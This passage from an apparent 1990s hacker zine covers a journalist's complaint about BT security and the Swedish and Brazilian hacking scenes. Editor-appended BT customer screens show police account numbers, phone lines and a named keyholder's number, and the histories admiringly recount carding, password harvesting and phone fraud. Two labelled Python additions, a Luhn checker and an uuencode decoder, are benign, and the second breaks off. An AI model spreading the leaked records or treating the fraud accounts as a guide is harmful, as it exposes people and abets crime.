insecure does it? 


And there we have it, passwords being shared, passed, written down, 
typed in and shouted across the office. You can forget about any notion 
of security, the moment you take that step the whole system is 
pointless, you may as well print out all the secret information and sell 
it in Dillons - it would certainly make the phone book a best seller! 
Better still if the marketer’s got what they wanted, put it on CD-ROM 
and charge a fortune for it at christmas; 


[The Multimedia Secrets Collection, 199.95! 


The ideal christmas gift for the spy in your life. Includes music from 
around the world. BT, it’s good to talk! NB it may be an offence to 
talk to anybody about this. 


Now you see why BT are keen to quell this espial, they know the 
situation, but don't want it publicised, it's very embarrassing, for 
goodness sake they have a contract to advise the government on 
computer security! Frankly, I couldn't care less if some BT mandarin 
gets a red face, it is no concern of mine. What is, is the fact that 
these secrets are not encrypted and are broadcast around the country on 
computers and are available to just about anyone who cares to look at 
it. The only warning displayed was 'Unauthorised access is an offence 
under the Computer Misuse Act (1990)' - but this access isn't 
unauthorised, is it? This notion of 'confidential' is a joke. BT's 
computers happily broadcast your ex-directory telephone number (and soon 
your name) down the line unless you make the choice to prevent it. What 
is confidential about that? The public interest is of prime importance 
here. The scandalous intimation in my legal gag is that I am risking 
national security? Me! Well I have a lot to say about that, it's not 
me that allows any old temp to see secrets, and I have never printed a 
single telephone number or details of any equipment, unlike some 
respected others. I brought the fact this could be done to light in a 
responsible journalistic manner. 


If I was such an expert, the intelligence service would have snapped me 
up immediately, BT would have paid me off and the government could have 
avoided embarrassment. But I'm not, I'm a journalist. The Independent 
published this story and I have respect for them, they took a risk and 
then wanted to distance themselves from me, which I understand. It was 
however a lonely, cold and frightening experience which is not yet over. 


The governments of these lands talk big about how the information 
superhighway will change all our lives, and how committed they are to 
servicing this new form of infrastructure leading to a new, fresh and 
exciting dimension - but they also punish, abuse, prosecute, imprison 
and destroy the lives of the people who may be far better able to 
exploit their ignorance and expose the sensitive underbelly of their 
power - their information. If you ask me, the old guys will make 
CyberSpace just as ugly and corrupt as the society they have already 
spawned, nurtured and set on a path of destruction out here. I for one 
don't want or need their advice, support or money - let them lay in the 
bed they have made, I'll stay in CyberSpace. 


- Related Info Appended by the Editor - 


DCS DISPLAY CUSTOMER SUMMARY 22/22/22? 11:41 
Name : THE CHIEF CONSTABLE Telephone No : 031-315 2007 NOR 
Account No : 8077 0366 
Address: LOTHIAN & BORDERS POLICE Customer Type: BUSINESS VOLUME 
POLICE HEADQUARTERS Installations: 1 
5 FETTES AVE 
EDINBURGH LINE DETAILS 
EH4 1RB Installed : 26/08/88 
Line Status : B/W 
Curr State 
Inst Class’n : BUS SINGLE EXCL 
ORDER Exchange Type: TXDX03 
RECEPTION MARKER Recent Order : YES 
Contr Signed : BILLING 
REPAIR CONSENT Method of Pay: ORDINARY ACCOUNT 
: NO Systems Bus : C A/C U/Enquiry: NO 
Servicecare : NO Sup Serv Bus : D D/M Case : NO 
O/S fault : NO Cust Options : STANDARD VRUF 
Hist fault : NO OSC Ind : NO 
Hazard : CUSTOMER CONTACTS 
Warning : Issue : NO Notes : YES 
BRDCST MANAGERS USING NJR-PLEASE DNB"NJRNEWS" FOR UPDATE ON CALLOUT PROBLEM ES 
4A O-O 
DCRD PRODUCT TARIFF DETAILS 22/22/22? 11:41 
Exchange Name : DEAN Tel No : 031-315 2007 NOR 
Installed : 26/08/88 a/c No : 8077 0366 
Inst Class’n : BUS SINGLE EXCL Notes : YES S/S No : 
OTY PROD ID SHORT DESC or MSC / CP NOTE TARIFF :RATE TOTAL 
1 A1l4499 C EXCH LINE + LINEBOX 32.66 32.66 
* 
1 A10117 C BASIC DIAL PHONE 4.70 4.70 
* 
1 A12481 C PRIVACY SET NO 8 oa Os ic) BT 245 
* 
TARIFF GRAND TOTAL : 89.11 
ES 
4A O-O 
DIN DISPLAY NOTE DETAILS 22/22/22? 11:41 
Installation : THE CHIEF CONSTABLE Tel no : 031-315 2007 NOR 
Name 
WRITTEN < AUTHOR > EXPIRES 


8/ 2/94 JOSEPHINE/8813 8/ 2/95 
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A/.D LTR SENT FOR 0506843235, 0313322106 
0506881101 AND 0313152007 
DCS DISPLAY CUSTOMER SUMMARY 22/22/27? 11:43 
Name LOTHIAN & BORDERS POLICE Telephone No 031-332 2106 NOR 
Account No 8076 9640 
Address: POLICE HEADQUARTERS Customer Type: PAYPHONE BUS 
5 FETTES AVE Installations: 1 
EDINBURGH 
EFH4 1RB sINE DETAILS 
Installed 04/10/83 
Line Status B/W 
Curr State 
Inst Class’n BUS PAYPHONE 
ORDER Exchange Type: TXDX03 
RECEPTION MARKER Recent Order NO 
BMC/C/N/ / / Contr Signed YES BILLING 
REPAIR CONSENT Method of Pay: ORDINARY ACCOUNT 
cis Systems Bus D A/C U/Enquiry: NO 
Servicecare S Sup Serv Bus € D/M Case : NO 
O/S fault NO Cust Options SINGLE LINE OPTION 
Hist fault NO OSC Ind : NO 
Hazard CUSTOMER CONTACTS 
Warning Issue COM Notes YES 
ES 
4A _ O-O 
DCRD PRODUCT TARIFF DETAILS 22/22?/27? 11:43 
Exchange Name DEAN Tel No 031-332 2106 NOR 
Installed 04/10/83 a/c No 8076 9640 
Inst Class’n BUS PAYPHONE Notes YES S/S No 
QTY PROD ID SHORT DESC or MSC / CP NOTE TARIFF: RATE TOTAL 
A17867 C PAYP LINE SKTD SGL LINE TG10 32.66 32.66 
* 
A19493  C OPTION 50 NON-ISDN SITE LINE 0.00 0.00 
* 
A11790 C INTERNAL EXTN OFF MASTER SCKT 0.00 0.00 
* 
A17817  O MINSTREL PLUS PHONE Outright sale 
FREE GIFT - NO GUARANTEE 
A11810 C METER PULSE FACILITY 6.70 6.70 
* 
A19398 C PAYPHONE 190MP TABLE-TOP MODEL Outright sale 
KEYHOLDER BETTY MITCHELL ON 031.311.3338 
Standard Care charge on A19398 12.00 12.00 
* 
TARIFF GRAND TOTAL 51)...3'6 
ES 
4A O-O 
DIN DISPLAY NOTE DETAILS 227 22/22 L1is43 
Installation LOTHIAN & BORDERS POLICE Tel no 031-332 2106 NOR 
Name 
WRITTEN < AUTHOR > EXPIRES 
8/ 2/94 JOSEPHINE/8813 8/ 2/95 
A/.D LTR SENT FOR 0506843235, 0313322106 


0506881101 AND 0313152007 
International Scenes 


There was once a time when hackers were basically isolated. It was 
almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980’s, thanks largely to the existence 
of chat systems accessible through X.25 networks like Altger, tchh and 
QSD, hackers world-wide began to run into each other. They began to 
talk, trade information, and learn from each other. Separate and diverse 
subcultures began to merge into one collective scene, and this has 
brought us the hacking subculture we know today: a subculture that knows 
no borders, one whose denizens share the common goal of liberating 
information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this 
group is growing by leaps and bounds. With this in mind, we want to 
help further unite the communities in various countries by shedding 
light onto the hacking scenes that exist there. If you want to 
contribute a file about the hacking scene in your country, please send 
it to us at phrack@well.com. 


This issue we have files about the scenes in Sweden and Brazil. 


The Swedish Hacker Scene 


It’s about time to fill up this hole in the worldwide history of hackers 
published in the Phrack series of articles on national scenes. Since no 
one else seems to be getting around to doing it, I’d better do it myself. 


Sweden was in fact one of the countries in the front line during the 
birth of computers in the 1940’s and 50’s. By 1953 KTH university in 
Stockholm had built BESK, at the time the fastest and most advanced 
computer in the world. During the late 1960’s Linkoping university 
specialized in computer science, and in 1973 the computer society Lysator 
started out as an offshoot of the American hacker culture of the kind you 
could find at MIT during the 60’s and 70’s. They are still active and 
are often referred to as the first Swedish hacker society ever, which is 
indeed true. Nowadays they still adhere to the international hacker 
ethic of university societies, and their ranks include idiots as well as 
really bright guys (as is the case with most such societies); their 
contributions to the world of e-culture include Project Runeberg, a text 
archive of Scandinavian literature, and a voluminous FTP archive. 
There’s actually a lot of ASCII work being done at Lysator, including 
converting Phrack back issues to HTML format. 


Despite the early interest in computers in Sweden there was no 
equivalent to the American phreakers of the 1970’s. This was not caused 
by lack of knowledge but rather by dullness. During the 70’s and early 
80’s Sweden was in a period of both economic wealth and social mentality 
commonly known as "The Welfare State". Everybody enjoyed the same high 
economic standard, nobody was really displeased with Swedish society, 
and the government funded lots of spare-time activities for youths. Thus 
the breeding ground for any outlaw societies was removed. (E.g., the 
Hells Angels didn’t start out in Sweden until the 80’s.) Swedes were in 
fact too pleased, too wealthy and too filled up with their vision of an 
almost utopian society to get even the faintest glimpse of an idea to 
form any underground movements. Even political groupings like 
Anarchists, Hippies (in Europe referred to as "Provos") or Fascists were 
almost WIPED OUT by the extreme political climate and wealth of the 
70’s. 
Thus, phreaker culture couldn’t possibly start out in Sweden at this 
time, though some freaked-out engineers and radio amateurs might have 
built blue boxes and similar equipment for their household needs. This 
state of society caused Sweden to lag behind other European and 
Scandinavian countries in the field of outlaw hacking. 


The first hacker activity in Sweden was reported by the authorities in 
1980. The hacker in question was a student at Chalmers university in 
Gothenburg and was sued for manipulating the account system into 
granting him free access to the mainframe, for which he was sentenced to 
a relatively light fine. Apart from some similar incidents carried out by 
bright individuals there was no real H/P scene until 1984. Also in 1980 
BBS activity started out in Sweden. Most enthusiasts were using a 
Swedish micro built by Luxor and DIAB in 1978 called ABC-80 (obviously 
inspired by the American TRS-80). These enthusiasts, however, were 
well-organized engineers running a straight user group; no anarchists or 
radicals of any kind were ever involved. 


In 1984 a magazine called "Rolig Teknik" started out as an offshoot of 
YIPL/TAP featuring the same kind of material, and by 1987 some 
journalist "discovered" this magazine, causing a lot of noise throughout 
The Welfare State and bringing people out in a public debate on how to 
defeat this magazine. (Though it actually didn’t feature any illegal 
material; even Sweden has the freedom of speech and press written 
explicitly into its constitution, as in the American First Amendment.) 
"Rolig Teknik" rapidly became a cult medium for underground electronics 
freaks, outlaw radio amateurs, and other antisocial movements. But let’s 
not get ahead of events. 


By early 1984 two youths aged 17 and 19, clearly inspired by the movie 
"War Games", hacked their way into several Swedish computer systems 
using a simple Apple II and a 300 baud modem, notably DAFA-Spar - a 
register containing public information on every Swedish citizen. Though 
there were no secret data in this computer, and though these hackers 
never succeeded in gaining root access, the incident was annoying to the 
authorities. Also this year, some wealthy upper-middle class youths 
started using what was to become the major European home computer: the 
Commodore 64. What the Apple II was for America, the C-64 was for 
Europe. Enter the software crackers. 


The C-64 was THE symbol of hackerdom to Swedish youths in the 1980’s. As 
software cracker Mr.Z pioneered the hacker scene in 1983 with hundreds 
and hundreds of cracked games, Swedish hackers somehow came to believe 
that cracking games was the Big Thing for any hacker. Besides, not many 
of these guys had modems. By 1987 American game producers were alarmed 
by the Niagara of cracked C-64 software being downloaded from Europe, 
causing them to start copy-protecting games that were to be exported to 
Europe. A closer examination showed that a lot of these cracks were made 
by Swedish groups, notably Triad and Fairlight. Thus, most Americans to 
get in touch with the Swedish hacker scene were what you would refer to 
as the "Warez d00ds" or "Pirates" of the time. Since the Swedes were 
unable to phreak due to lack of knowledge in the telecom field, American 
warez d00ds constantly called up Swedish crackers to obtain the latest 
software. 


There seems to be some kind of misconception in the American view of the 
hacker culture of Europe: not very many hackers in Sweden and the rest 
of Europe got into phreaking or net hacking in these early years, 
perhaps with the exception of the movement in Germany caused by the 
Chaos Computer Club. By tradition most European hackers in general, and 
Swedish hackers in particular, turned to software cracking and demo 
programming. (The Demo as an art form was invented in Europe during 
1984-86.) None of these activities were actually illegal at the time, 
though indeed underground. This might have helped to create the 
general American view of European hackers as "Idiotic Immature Warez 
d00ds". In fact, most European hackers look upon software cracking and 
demo programming with pride, though spreading (warez trading) wasn’t 
considered a real hacker activity, and pirating for economic gain was 
looked upon with disgust and utter contempt. Software spreading in all 
forms was finally outlawed in Sweden on January 1st 1993. 


1986: Enter the Netrunners. 
By the year 1986 the legendary BBS "Tungelstamonitorn", under the 
supervision of Jinge Flucht, began distributing H/P and Anarchy files. 
Jinge himself, being a social inspector and thereby fully aware of the 
state of society, was upset with The Welfare State and thought the 
Swedes had gone law-abiding in an absurd and unhealthy manner. In his 
view people seemed to accept laws without ever questioning them, thereby 
making Sweden into a conformist utopian hell. Later Jinge joined 
Fidonet, where he got known for running the most explicit and intense 
debates in Swedish BBS culture ever. 


Probably the H/P files stored at Jinge’s BBS were the spark that lit the 
Swedish net hacking scene. Swedish hackers had SEEN "War Games", HEARD 
about the CCC in Germany, and now they finally got their hands on 
documents that explained the techniques. In 1987 excerpts from Steven 
Levy’s "Hackers" and Bill Leebs "Out of the Inner Circle" were reprinted 
in the Swedish computer magazine "Datormagazin" by editor Christer 
Rindeblad, creating a common group awareness among Swedish hackers. 
("Out of the Inner Circle" had actually been translated into Swedish 
already in 1985, but was obviously read mostly by security experts and 
War Games-obsessed wannabes.) 1987 also saw the birth of the first 
all-Swedish hacker group ever to make a name for themselves outside 
Scandinavia. This was of course SHA - Swedish Hackers Association. 


SHA wanted to be a hacker group of international standards and 
quality. They collected the best people, storing up a knowledge base 
for future use. In the years 1989-92 SHA was at its height, successfully 
trashing computer companies and computer scrap dumps and gaining access 
to hundreds of computers. Inspired by the German hackers Pengo and 
Hagbard in Leitstelle 511, they started having regular meetings on 
Fridays at their own booked table in a restaurant in Stockholm. Their 
perhaps biggest achievement ever was made in 1991 when they wrote a 
scanner to exploit the Unix NIS bug, running it on 30 processes 
simultaneously, and ending up with some 150,000 passwords, of which 600 
gave root access. Though some would say SHA were a bit too fond of the 
media image of hackers and sometimes had a weakness for hacker cliches, 
no one can really deny their achievements. 


Swedish hackers also got a lot of attention for their carding activities 
in 1989. Both Sneaker of SHA and Erik XIV of Agile wrote modulo 
10-calculators to produce endless series of valid Visa numbers. Erik XIV 
was even on national television, demonstrating the weaknesses of the 
credit card system. Cynically, they were both busted. 
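The "modulo 10" calculation referred to above is the Luhn check digit that Visa and the other major card schemes append to card numbers. What follows is an added example (mine, not code from the article or from the people it describes) that implements the check and shows what it does and does not guarantee: every single-digit error is caught and every adjacent transposition except 09/90 is caught, but a number that passes is merely well-formed, not an existing or authorized account, which is exactly why producing Luhn-valid numbers exposed a weakness in any system that trusted the number alone. The number 4111 1111 1111 1111 is a widely used test number; 4109 1111 1111 1115 is constructed here to contain a "09" pair.

```python
# Added example: the Luhn ("mod 10") check digit carried by payment card
# numbers.  It is an error-detecting checksum, not a security control.


def luhn_sum(digits: str) -> int:
    """Luhn sum over a digit string, check digit (rightmost) included.

    Every second digit counted from the right is doubled; a doubled value
    above 9 has 9 subtracted (equivalent to summing its two digits)."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = ord(ch) - ord("0")
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total


def luhn_valid(pan: str) -> bool:
    """True if `pan` (spaces and hyphens allowed) is a Luhn-valid number.

    Passing only means the digits are internally consistent; it says nothing
    about whether the account exists or the holder is authorized."""
    digits = pan.replace(" ", "").replace("-", "")
    if not digits.isdigit() or not 12 <= len(digits) <= 19:
        return False
    return luhn_sum(digits) % 10 == 0


def single_digit_errors_caught(pan: str) -> bool:
    """Mutate every digit of a valid number to every other value and confirm
    each result is rejected.  Luhn guarantees this: at an undoubled position
    the sum changes by a non-zero amount below 10, and at a doubled position
    d -> (2d, minus 9 if above 9) is a permutation of 0..9."""
    digits = pan.replace(" ", "").replace("-", "")
    if not luhn_valid(digits):
        raise ValueError("start from a Luhn-valid number")
    for i, original in enumerate(digits):
        for replacement in "0123456789":
            if replacement == original:
                continue
            if luhn_valid(digits[:i] + replacement + digits[i + 1:]):
                return False
    return True


def adjacent_transposition_missed(pan: str) -> list:
    """Positions (0-based) where swapping two adjacent digits leaves the
    number Luhn-valid.  The only swap Luhn misses is 09 <-> 90, because a
    doubled 9 and an undoubled 9 both contribute 9 while 0 contributes 0."""
    digits = pan.replace(" ", "").replace("-", "")
    missed = []
    for i in range(len(digits) - 1):
        a, b = digits[i], digits[i + 1]
        if a != b and luhn_valid(digits[:i] + b + a + digits[i + 2:]):
            missed.append(i)
    return missed


if __name__ == "__main__":
    for pan in ("4111 1111 1111 1111", "4109 1111 1111 1115", "4111 1111 1111 1112"):
        print(pan, "valid" if luhn_valid(pan) else "invalid")
    print("single-digit errors all caught:",
          single_digit_errors_caught("4111 1111 1111 1111"))
    print("transpositions missed in 4109...:",
          adjacent_transposition_missed("4109 1111 1111 1115"))
```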


At Christmas 1990 the Swedish X.25 network Datapak and Decnet were both 
attacked by a group of UK hackers called 8LGM (8 Little Green Men or 
8-Legged Groove Machine - I don’t know which one is a media nick). Using 
a war dialer they scanned about 22,000 entries and successfully accessed 
380 of these. This is perhaps the most well-known of all hacks in 
Sweden, causing a lot of media noise. (The exact figures are a product 
of the Swedish telephone system AXE that I will write more about in a 
moment.) As reported in Phrack #43 they were busted and convicted under 
the new British anti-hacker law. 


Later Swedish achievements include the phonecard emulator, constructed 
by Atari ST enthusiast Marvin in 1992, after hearing the Swedish phone 
company Telia boast of these prepaid phonecards’ superior security. 
Though these silicon-based chip phonecards (256 byte serial EPROMs) 
couldn’t actually be recharged or easily tampered with, he realized 
there was no problem in emulating the chip with a Motorola 68c705 
one-chip computer. Some fake phonecards were manufactured and sold for 
almost nothing among his very best friends, more on a "See, it can be 
done" basis than with any intention to defraud Telia or earn heaps of 
money. Somehow the blueprints for the emulator found their way onto the 
Internet. 
Swedish hackers in general have a very strong tradition of forming 
groups, due to their roots in programming activities rather than 
phreaking. Group awareness and culture is very widespread and accepted 
within the boundaries of the whole Swedish computer underground. Thus, 
LOYALTY is very strong among Swedish hackers. Most hackers who get 
busted by authorities or blackmailed by companies would rather DIE than 
tell the name of even a single 10-year-old warez d00d. 


While we’re at it - hacker busts, and phreaker busts in particular, are 
carried out in quite a disturbing manner in Sweden. To explain this I 
must first explain a bit about the Swedish telephone system. 


Almost all Swedish networks use a system similar to 4ESS, constructed in 
cooperation by the State Telecom "Televerket" and the Swedish 
telecommunications equipment producer Ericsson Telecom. This system is 
called AXE, which is an abbreviation for Automatic Cross-Connection 
Equipment. AXE is used in some 100 countries all over the world and is 
probably one of the most beautiful exchange systems ever developed. AXE 
is designed for national, metropolitan and rural networks, and the same 
system nucleus is used in all the different systems. It can control both 
digital and analog equipment, though it’s made with the aim of 
transforming all Swedish networks from analog to digital connections. It 
also comes with a fully featured bureaucratic organization for 
maintenance, administration and economics in general. AXE has the 
capability of building virtual groups in switching stations, thus 
putting your PBX into the telco soup as well, making you believe you 
have control over it though it’s actually located elsewhere. 


In short, this is a centralized, monolithic system of the horribly 
efficient type that telcos love. It tells any amateur to keep their 
hands off and do something else. Of course it’s a system that hackers 
and phreakers hate, since it’s limited to authorities. The filthy crowd 
do not know what is going on inside these exchanges, and the telcos like 
to keep it that way. 


AXE also works with stored program control that resides inside the 
system core of every switching station. Of course this is all software, 
and of course State Telecom, upon building AXE, couldn’t hold back their 
Big Brother tendencies. 


The result is that every call made from anywhere to anywhere is logged 
in a central computer. Now that’s something! Not only did this equipment 
wipe out every possibility to box within Sweden, but it also removed 
every kind of phone privacy. In fact not only calls are logged, but ALL 
activity performed at your terminal. If you lift the handset, press a 
digit and hang up, the time, date and the digit you pressed are 
registered. All this data is stored on magnetic tapes for 6 months. 


Now, luckily Sweden has a strong Computer Privacy Act. You just aren’t 
allowed to set up and use such facilities as you please, not even if you 
are the State Telecom. There is even a specific authority, 
"Datainspektionen" (The Computer Inspection Department), whose only 
purpose is to look after and preserve citizen privacy by protecting 
individuals from corporate and governmental interests. As a result the 
State Telecom "Televerket" (which later changed its name to "Telia" as 
it was transformed from an authority into a private corporation as of 
July 1st 1993) was not allowed to give out any of the information 
gathered in these registers to anyone other than either the calling or 
the receiving party. Not even the police could have this information 
unless they were investigating an indictable crime resulting in at least 
2 years of prison, such as drug trading or terrorism, and you don’t get 
that kind of penalty for phreaking alone - at least not in Sweden. 


But Telia could evade these restrictions. In order to successfully 
phreak using PIN codes, you have to call an operator using a Swedish 
version of the 800-number: a 020-number. Telia could then claim the call 
was made to the owner of that number: AT&T, MCI & Sprint mostly. (There 
are of course Calling Cards in Sweden as well: "Telia Access", neither 
used nor abused by anybody.) Just as these companies have their own 
intelligence agencies, so does Telia. Once, e.g., AT&T had someone traced 
for phreaking, Telia could easily produce a complete list of calls made 
to AT&T operators from a certain number. Telia themselves would even use 
information they weren’t allowed to: they would pull out a list of ALL 
outgoing calls from the phreaker in question including calls to MCI, 
girlfriends, mom, dad, grandma... all logged calls. 


Telia would then call this poor phreaker in to their local Swedish 
office, stick the endless list under his/her nose, and command: "TALK, 
or we will turn you in to the authorities", carefully omitting to 
mention that all information on the printout would be absolutely useless 
in court. The only conclusive evidence would in fact be those calls 
traced back all the way from America or wherever the phreaker called, 
and in that way rigorously documented. Naturally, the common phreaker 
had no legal experience and wouldn’t know about this. Instead he would 
talk, giving out detailed information on his/her techniques worthy of a 
full-time, highly educated security consultant. After this session the 
phreaker was given a bill for the calls that could indeed be proven in 
court. If he/she didn’t pay it, Telia (or any other operator) would end 
up turning him/her over to the authorities anyway. So much for 
cooperation. Telia themselves would, if they felt it was necessary, go 
even further than the overseas operators, systematically exposing every 
weakness in the phreaker’s personal life, using the information in the 
computer log for psychological terror. 


This pattern of treatment of Swedish phreakers seems to be very much the 
same among all telecom providers in Sweden. Lately Telia, under command 
of security officer Pege Gustavsson, made some noteworthy mistakes 
though: in their efforts to convict as many phreakers as possible, they 
called up companies receiving calls from "suspicious" individuals, 
warning them about this or that person calling them over and over again. 
This could only mean Telia was also systematically monitoring some 
Swedish hackers and had formed some security group to carry out this 
surveillance. Normally this should have been kept quiet, as Telia are 
absolutely not allowed to form their own abuse police forces, but at 
some instance they happened to call up a security company using 
phreakers as informants. Of course this security company didn’t like the 
idea of having "their" phreakers traced around, and the matter was 
brought to public attention. Many independent sources agreed that Telia 
had violated the Swedish Computer Act, and hopefully this brought an end 
to this wild tracing. You shouldn’t be too sure though, since Telia 
themselves never confessed to doing anything illegal. 


As you might have understood the Computer Act is quite an important 
factor in all legal discussions concerning Swedish hacking. This Act 
came out as a result of general attention focused upon the computers vs. 
privacy matter in 1973. As Sweden was one of the first countries to make 
use of computers in governmental administration, and as Swedish 
authorities were eager to register every possible piece of information, 
some politically influential individuals started a debate resulting in 
the founding of the Computer Act and the Computer Inspection Department. 
As a result Sweden is light years ahead of most countries when it comes 
to privacy matters. For example there is no problem in having the number 
identification possibilities on your line deactivated for good, and it 
won’t cost you anything. You can also easily obtain free printouts from 
any computer register containing information on you, including the 
register at your local AXE-exchange. 


To sum this article up I can draw the conclusion that even Sweden has 
had its handful of bright hackers, each category bringing their straw to 
the stack. Even though Swedish officials and companies would hardly 
admit it, these hackers have obviously been very important for this 
country, at least in forcing system managers, security officials, 
software producers, policemen, politicians and so on to think things 
over. Sweden has also attracted outside attention in some cases, and 
will probably keep doing so. If you should pinpoint one group that has 
meant more to the Swedish scene than any other, it wouldn’t be any of 
the H/P groups, but rather the cracking pioneers Fairlight - a well 
organized and world-famous warez producer. 


Linus Walleij aka King Fisher / Triad 
triad@df.lth.se 


(Some handles have been changed to protect retired Swedish hackers from 
luser mail.) 


Swedish readers may be interested in the fact that I’m currently writing 
a lengthy text in Swedish (a book actually) providing a closer look at 
Swedish hacking history, which will be released on hypertext and ASCII 
sometime later this year. Over and out from Sweden! 


HACKING IN BRAZIL 


Before talking about hacking here, it’s good to describe the conditions 
of living. Right now, the country is a mix of Belgium and India. It’s 
possible to find both standards of living without travelling long 
distances. The Southern part of the country concentrates most of the 
industry, while in the west one can find the Amazon jungle. There are 
many Brazils, one could say. 


Beginning with the hacking and phreaking. 


Hackers and computer enthusiasts have several different places for 
meeting. When this thing started, around the time of that film 
"Wargames", the real places to meet hackers and make contacts were the 
computer shops, game arcades and "Video-texto" terminals. The computer 
shops were a meeting place because many of those "hackers" had no 
computers of their own and the shop owners would let them play with them 
as part of an advertising tool to encourage people to buy one for their 
kids. 


Today that is no longer needed, since prices have dropped and people 
make a team already at school or sometimes just join a BBS (most people 
who buy a modem end up thinking about setting up a BBS). By the way, 
most schools are advertising computer training as part of their 
curricula, to charge more, and like everywhere, I guess, people no 
longer learn typewriting, but computer writing, and many Brazilian 
newspapers dedicate a section to computer knowledge once a week, with 
advertising, hints, general info and even lists of BBS’s. 


A few years ago, the "Video-texto" terminals were also big meeting 
places. That was part of an effort to popularize the use of a 
computer linked by modem to get services like MSX games, info on the 
weather, checking your bank account and so on. Just like the Net, one 
could do e-mail, by some fancy tricks, and other things that could be 
called hacking. The difference was that it was made by the state-owned 
telephone company and each time a trick became too well known, it was 
changed. The only way to keep up was keeping in touch with the 
people who used the system like hell. It’s no different from what 
happens with the computer gurus. The protocol used for that, X.25, is 
the same used for banking money transfers, but don’t think it was 
possible to do anything more than checking how much money one had and a 
few other classified data. People who used that at home (not too many, 
since the company didn’t think it would be such a hit, and didn’t 
provide for it) could spend their fathers’ money discovering funny things 
about the system, like messing with other people’s phones and so on. One 
could also use the terminals at the Shopping Centers to make phone 
calls to their friends without paying. The guy at the other end would be 
heard through the small speaker. 


Phreaking here in Brazil is something secret. Apart from the trick 
described in the section "Letters to read by" in the summer 1994 issue 
of 2600 Magazine, where one would call through a locked rotary telephone, 
little is known about phreaking. One thing is that people who enrolled 
in Telecommunications Engineering could call Europe and the USA with 
ease, but they would not tell you how. It must be said that all public 
phones have metal sheathing around the cables and that the phone 
machines are quite tough to break down. I guess it wasn’t for beauty. 


The phones use some sort of metal coins called fichas, which must be 
bought somewhere. The trick is to use a coin with a string, so it would 
not be collected. But if the police catch you... The police don’t follow 
rules about that. Either they put a fine on the guy for that, or arrest 
him for vandalism or anything else they think of at the moment. It is a 
hassle, anyway. My friend who was doing electrical Engineering told me 
that boxing in Brazil was impossible. The system is just not good enough 
to be boxed. Another friend of mine told me that in the Northeast part, 
where people are a little bit different and more easy-going, the phone 
system can be boxed, because some top brass asked the company to leave 
that feature implemented. The Phone company doesn’t admit any knowledge 
about that. 


Internet access is something quite hard to get today. Until a few weeks 
ago, the system would not allow the creation of an Internet site that 
was not part of some research project. So, only Universities and the 
like were capable of putting people in the Net Universe. In the 
University of Sao Paulo, people in the post-graduate courses could get it 
with ease, but undergraduate students would have to show some connection 
to a research project. That in theory, because the students found out 
that one could use the IBM CDC 4360 to telnet without an Internet 
account. Also, all the faculties had computer rooms full of AT 386s 
which were linked by fiber optics to this computer. Another one did the 
file transfers between the accounts and the computers in the computer 
rooms, and that ftp was also possible without an account, but only to a 
few sites, like oakland and so on. That lasted for about a year, until 
that thing was fixed in the router, but only at the Politechnik School. 
Legend says that the guys were downloading too many GIF and JPG pictures 
of Top Models from an ftp site nearby. That used so much bandwidth that 
the site started to complain and both things happened: the site stopped 
storing GIFs of wonderful women in swimsuits and the router was fixed to 
prevent ftp without an Internet account. One can still today connect to 
the outside world via telnet and many people have accounts on Internet 
BBSs like Isca BBS, Cleveland Freenet and the like. The Bad Boy BBS was 
"in", until it went out of business. This kind of access is not good, 
though, for it is very slow, sometimes. Also, it is hard to download 
something bigger than 60 kbyte. The way I devised: downloading the file 
inside the BBS and uuencoding it. This way you could list the file and 
capture the screen listing, uudecode it after some editing and have a 
working .exe or .zip file. 
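The recipe just described (uuencode inside the BBS, list the file, capture the screen, edit, uudecode) is a general way to move a binary over any text-only session, which is also why uuencode listings in captured terminal logs are something the operator of such a system would want to notice. The following is an added example (mine, not the author’s): it uuencodes a constructed file, simulates the residue a terminal capture adds (CRLF line ends, trailing blanks, a pager prompt, an echoed command), cleans and decodes it, and shows why a separate digest is needed: the standard decoder pads a body line shortened by line noise with zero bytes instead of failing. The prompt strings, pager patterns and file name are constructed for the example.

```python
import binascii
import hashlib
import re

# Constructed sample "file": 269 bytes, deliberately not a multiple of the
# 45-byte uuencode line size, with a run of zeros to exercise '`' encoding.
SAMPLE = bytes(range(256)) + b"\x00" * 13
SAMPLE_SHA256 = hashlib.sha256(SAMPLE).hexdigest()

# Pager and prompt lines a screen capture typically picks up (constructed).
NOISE = re.compile(r"^(--More--|-- More --|Press any key.*|bbs> ?.*)$",
                   re.IGNORECASE)


def uuencode(data: bytes, name: str, mode: int = 0o644) -> str:
    """Classic uuencode listing: 'begin' header, 45-byte body lines, '`', 'end'."""
    lines = [f"begin {mode:o} {name}"]
    for i in range(0, len(data), 45):
        # backtick=True writes zero sextets as '`' instead of ' ', so a terminal
        # or editor that strips trailing blanks cannot damage the data.
        line = binascii.b2a_uu(data[i:i + 45], backtick=True)
        lines.append(line.decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return "\n".join(lines) + "\n"


def uudecode_capture(capture: str) -> tuple:
    """Recover (name, data) from a screen capture containing a uuencode listing.

    Tolerates CRLF, trailing blanks, echoed commands before 'begin' and pager
    prompts inside the body.  Raises ValueError naming the line if a body line
    contains characters uudecode cannot accept."""
    name, in_body, out = None, False, bytearray()
    for lineno, raw in enumerate(capture.splitlines(), 1):
        line = raw.rstrip()
        if not in_body:
            m = re.match(r"^begin\s+[0-7]{3,4}\s+(\S+)$", line)
            if m:
                name, in_body = m.group(1), True
            continue
        if line == "end":
            return name, bytes(out)
        if line in ("", "`") or NOISE.match(line):
            continue  # blank line, zero-length terminator, or pager residue
        try:
            out += binascii.a2b_uu(line)
        except binascii.Error as exc:
            raise ValueError(f"line {lineno}: cannot decode {line!r}: {exc}") from exc
    raise ValueError("no complete begin/end block in capture")


def verify_digest(data: bytes, expected_hex: str) -> bool:
    """a2b_uu pads a *shortened* body line with zero bytes rather than failing,
    so the decoder alone cannot detect line noise that ate characters.  The
    sender publishes a digest out of band and the receiver checks it."""
    return hashlib.sha256(data).hexdigest() == expected_hex


def simulate_capture(listing: str) -> str:
    """Constructed: what 'type the file, capture the screen' leaves in the log."""
    noisy = ["bbs> type demo.uue", ""]
    for i, line in enumerate(listing.splitlines()):
        noisy.append(line + ("   " if i % 2 else ""))  # trailing blanks
        if i == 3:
            noisy.append("--More--")                    # pager prompt mid-file
    noisy.append("bbs> ")
    return "\r\n".join(noisy) + "\r\n"


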